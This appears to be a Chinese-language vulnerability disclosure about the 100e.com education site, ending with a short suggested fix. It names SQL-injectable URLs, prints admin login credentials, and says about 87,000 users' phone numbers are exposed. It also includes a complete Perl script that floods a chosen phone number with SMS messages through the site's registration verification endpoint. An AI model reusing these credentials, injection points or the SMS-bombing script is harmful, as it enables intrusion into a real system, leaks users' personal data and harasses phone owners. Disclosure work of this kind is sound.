见详细说明，多处安全漏洞，会导致8.7w用户敏感信息泄露。
详细说明：http://edu.100e.com/course/instance/?id=4091

http://space.100e.com/myspace/MyDiaryList.asp?username=admin

都是注入
http://admin.100e.com 后台
登陆框是post注入

U:0001 P:111进入
后台有啥你们自己知道，8.7W用户的电话还是很可观的
后台也都是注入。

貌似是整个站只要是查询数据库的地方就有注入- -
shell不拿了，会有脱裤的嫌疑

然后，还有个强力的短信Ddos攻击接口，注册验证的地方~~
拿perl写了个脚本测试了下，好用！

use strict;
use LWP::Simple;
require LWP::UserAgent;
my $url = 'http://passport.100e.com/register/new/step_mobile.aspx';
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
print "请输入要攻击的手机号：";
my $dh=<STDIN>;
chomp $dh;
print "请输入攻击次数：";
my $i=<STDIN>;
chomp $i;
for (my $a=1;$a<=$i;$a++)
{
my $response = $ua->post( $url,
  ['postback' => 'postback',
  'mobile' => "$dh"]
  );
print "已发送$a次\n";
}

修复方案：

注入进行过滤，短信验证加上时间。